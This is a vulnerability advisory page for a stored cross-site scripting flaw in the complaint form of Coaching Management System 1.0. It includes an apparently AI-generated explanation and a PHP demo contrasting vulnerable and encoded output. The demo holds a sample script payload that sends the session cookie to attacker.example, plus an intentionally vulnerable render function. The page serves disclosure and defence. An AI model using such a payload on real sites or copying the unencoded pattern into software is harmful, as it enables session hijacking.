CVE-2026-7222
Description
A vulnerability was determined in code-projects Coaching Management System 1.0. Affected is an unknown function of the file /cims/modules/student/complaint.php of the component Complaint Form Page. Manipulation of the argument Complaint causes cross-site scripting. The attack can be initiated remotely. The exploit has been publicly disclosed and may be used.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in code-projects Coaching Management System 1.0 via complaint form allows admin session theft and account takeover.
Vulnerability Overview
A stored cross-site scripting (XSS) vulnerability exists in the Coaching Management System 1.0 from code-projects. The flaw resides in the complaint submission functionality (file /cims/modules/student/complaint.php) and the related reply feature. User input in the complaint and reply fields is not properly sanitized before being stored and later rendered in the admin panel (/modules/admin/incomingcomplaint.php) and student views [1]. This is a classic case of CWE-79: Improper Neutralization of Input During Web Page Generation.
Exploitation Path
An attacker with a low-privileged student account can submit a malicious JavaScript payload in the complaint field. When an administrator or teacher views the complaint, the payload executes automatically in their browser; for example, it can exfiltrate the session cookie (PHPSESSID) to an attacker-controlled server. The reply field is affected in the same way in the opposite direction: an admin can inject script into a reply that executes in student sessions [1]. The attack requires no privileges beyond a standard user account and can be performed remotely.
Impact
Successful exploitation lets the attacker steal session cookies of higher-privileged users. Cookie theft through script is only possible when the PHPSESSID cookie is not marked HttpOnly, and the PoC's successful exfiltration implies the cookie lacks that flag. With the admin's session cookie, the attacker can hijack the admin session and gain full control over the application, leading to account takeover, data exfiltration, and further malicious actions within the system. The PoC provided in the advisory confirms JavaScript execution and cookie theft in the admin panel [1].
Mitigation Status
As of disclosure, no patch has been released by the vendor, and the software appears to be in a maintenance-only state. Users are advised to apply context-aware output encoding wherever complaint and reply text is rendered (for HTML text and quoted-attribute contexts in PHP, htmlspecialchars with ENT_QUOTES and an explicit UTF-8 charset), to validate input on the server side as a secondary control, and to mark the session cookie HttpOnly and SameSite as defense in depth so that a script payload cannot read it; otherwise they should consider replacing the system. The exploit has been publicly disclosed and is likely to be used in attacks [1].
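The rendering defect described in the overview and the fix recommended above, as an added example that is not code from the Coaching Management System project: the first function mirrors the vulnerable pattern (stored complaint text echoed unencoded into the admin view), the second encodes at output time, and the third applies the HttpOnly/SameSite session-cookie settings that blunt cookie theft from a future XSS. The function names, the table layout, the student name, and the host attacker.example are assumptions made for this demo; the payload is a constructed sample, not the advisory's PoC.

```php
<?php
// Added illustration, not code from the Coaching Management System project.
// Function names, the table markup and attacker.example are assumptions for the demo.

declare(strict_types=1);

// Vulnerable pattern: stored text is interpolated into the page as-is, so a
// complaint containing <script> is parsed as markup by the admin's browser.
function render_complaint_vulnerable(string $studentName, string $complaint): string
{
    return "<tr><td>{$studentName}</td><td>{$complaint}</td></tr>\n";
}

// Hardened pattern: encode for the HTML text context at output time.
// ENT_QUOTES also escapes ' and ", so the helper is safe inside quoted attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string;
// the explicit charset avoids multibyte-encoding confusion.
// Not sufficient for JavaScript, URL or CSS contexts, which need their own encoders.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_complaint_safe(string $studentName, string $complaint): string
{
    return '<tr><td>' . html_encode($studentName) . '</td><td>'
         . html_encode($complaint) . "</td></tr>\n";
}

// Defense in depth: with HttpOnly set, document.cookie no longer exposes PHPSESSID,
// so a script payload cannot simply exfiltrate the admin session.
// Must run before session_start().
function harden_session_cookie(): void
{
    if (session_status() === PHP_SESSION_NONE) {
        session_set_cookie_params([
            'httponly' => true,
            'samesite' => 'Lax',
            'secure'   => true, // requires HTTPS; relax only for local testing
        ]);
    }
}

// Constructed sample input: a stored complaint carrying a cookie-stealing payload.
$samplePayload = '<script>fetch("https://attacker.example/c?" + document.cookie)</script>';

harden_session_cookie();
echo "Vulnerable output:\n" . render_complaint_vulnerable('alice', $samplePayload);
echo "Hardened output:\n" . render_complaint_safe('alice', $samplePayload);
```

Run with `php demo.php`. The vulnerable line reproduces the `<script>` element verbatim, which a browser would execute when the row is displayed; in the hardened line `<`, `>` and `"` come out as `&lt;`, `&gt;` and `&quot;`, so the browser shows the payload as text. The encoding belongs at every render site (admin panel and student views alike), not at submission time, because the same stored value may later be emitted in a different context.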
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: = 1.0
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.